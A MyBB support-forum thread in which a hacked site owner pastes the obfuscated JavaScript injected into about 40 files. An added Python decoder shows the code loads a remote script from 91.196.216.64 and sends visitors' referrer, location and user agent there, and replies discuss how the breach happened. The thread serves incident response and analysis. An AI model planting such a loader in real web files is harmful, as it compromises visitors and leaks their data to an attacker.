MyBB Community Forums

Full Version: Forum hacked (mybb 1.6.5)
My forum (1.6.5) has been hacked. It's the second time now. The first time I just wiped clean the directory and uploaded the new forum files.

My setup:
I'm actually running Drupal, and the forum is in Drupal directory.

It was detected on Windows XP, Firefox, Avast Antivirus, and here's the warning
URL:	http://91.196.216.64/s.php?ref
Process:	file://C:\Program Files\Mozilla Firefox\...
Infection:	url:Mal

I've been reading around and saw an almost similar situation, e.g. http://community.mybb.com/thread-111147.html

Mine's:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} 
;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

All 40 compromised files are JavaScript files, mainly located in the 'admin/jscripts' and 'jscripts' folders. Some Drupal files were affected as well.

I do not use any plugins and the forum is using the default installation settings. Permissions Reports didn't report anything suspicious.

How can I prevent this from happening again? I don't even know where the attack came from.
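An added example, not part of the original post, showing how a defender can read this kind of injected script statically instead of letting eval() run it. The packed code and the '|'-separated dictionary below are copied from the script above with their \xNN escapes decoded, and the base 33 is the value passed to the unpacker in that script; the function and variable names are my own.

```python
import codecs
import re

# Constructed input: the two entries of the posted script's string array that
# matter (the packed code and the '|'-separated dictionary), copied from the
# post with their \xNN escapes decoded, plus the base (33) passed to the unpacker.
PACKED = ("9=1.d('5');b(!9){8=1.j;4=6(1.i);7=6(g.k);a 2=1.e('c');2.f='5';"
          "2.h='w://t.u.l.v/s.r?q='+4+'&m='+8+'&n='+7;a 3=1.o('3')[0];3.p(2)}")
DICTIONARY = ("|document|js|head|hghjhjhjg|dgllhguk|escape|ugkkjkj|hghjghjhjgjh"
              "|element|var|if|script|getElementById|createElement|id|navigator"
              "|src|referrer|location|userAgent|216|lc|ua|getElementsByTagName"
              "|appendChild|ref|php||91|196|64|http")
BASE = 33
# Three short entries from the same array, kept escaped to show stage one.
RAW_ENTRIES = [r"\x7C", r"\x73\x70\x6C\x69\x74", r"\x72\x65\x70\x6C\x61\x63\x65"]

def js_unescape(s):
    """Stage one: decode the \\xNN escapes the packer wraps every entry in."""
    return codecs.decode(s, "unicode_escape")

def to_base(n, base):
    """JavaScript's Number.toString(base) for n >= 0 (the packer's token names)."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = ""
    while True:
        n, r = divmod(n, base)
        out = digits[r] + out
        if n == 0:
            return out

def unpack(packed, dictionary, base):
    """Stage two: replay what eval() would run. Every \\w+ token is a base-N
    index into the dictionary; an empty entry leaves the token as it is."""
    words = dictionary.split("|")
    table = {to_base(i, base): w or to_base(i, base) for i, w in enumerate(words)}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), packed)

def injected_script_url(decoded):
    """Pull the URL the decoded code assigns to the injected <script>'s src."""
    m = re.search(r"\.src='([^']+)'", decoded)
    return m.group(1) if m else None

if __name__ == "__main__":
    print([js_unescape(e) for e in RAW_ENTRIES])   # ['|', 'split', 'replace']
    source = unpack(PACKED, DICTIONARY, BASE)
    print(source)
    print("loads remote script from:", injected_script_url(source))
```

The decoded code creates a <script> element whose src is the same 91.196.216.64/s.php address Avast flagged, with the page's referrer, location and user agent appended as query parameters; that is what a scanner or a grep for the array name across the 40 files should be looking for.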

Did you use FBConnect by any chance?
(2012-01-11, 06:43 AM)crazy4cs Wrote: Did you use FBConnect by any chance?

I don't use any plugins.
Dumb Question: do you use very strong passwords?
At least one uppercase letter (pref more)
Multiple numbers
Multiple symbols
Not shared with another person at ALL
Length of at least 10 characters

I am just curious if they managed to brute force your password for FTP or something.
(2012-01-11, 07:19 AM)GamerVoid Wrote: Dumb Question: do you use very strong passwords?
At least one uppercase letter (pref more)
Multiple numbers
Multiple symbols
Not shared with another person at ALL
Length of at least 10 characters

I am just curious if they managed to brute force your password for FTP or something.

After the last hack a week ago, I changed my password to have upper/lower/number/punctuation.

Is it a case of a brute force password hack?
Were you using MyBB 1.6.4 at any time?
If the same things happened twice, I'd be taking a look at my hosting provider to make sure it's not an intrusion at the server level.
Are you using a shared host? Then your site might be in trouble.
(2012-01-11, 11:23 AM)jard0n5 Wrote: Are you using a shared host? Then your site might be in trouble.

Depends on your hosting provider.
(2012-01-11, 11:08 AM)Pirata Nervo Wrote: Were you using MyBB 1.6.4 at any time?

I was using MyBB 1.6.4 before. Can't remember if there was any intrusion during that time though.
(2012-01-11, 11:23 AM)jard0n5 Wrote: Are you using a shared host? Then your site might be in trouble.

I'm using shared hosting from Bluehost.